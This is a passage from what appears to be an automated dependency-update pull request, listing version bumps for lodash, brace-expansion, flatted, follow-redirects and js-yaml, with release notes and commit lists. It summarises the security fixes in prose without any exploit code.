\u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.3 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.3...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca 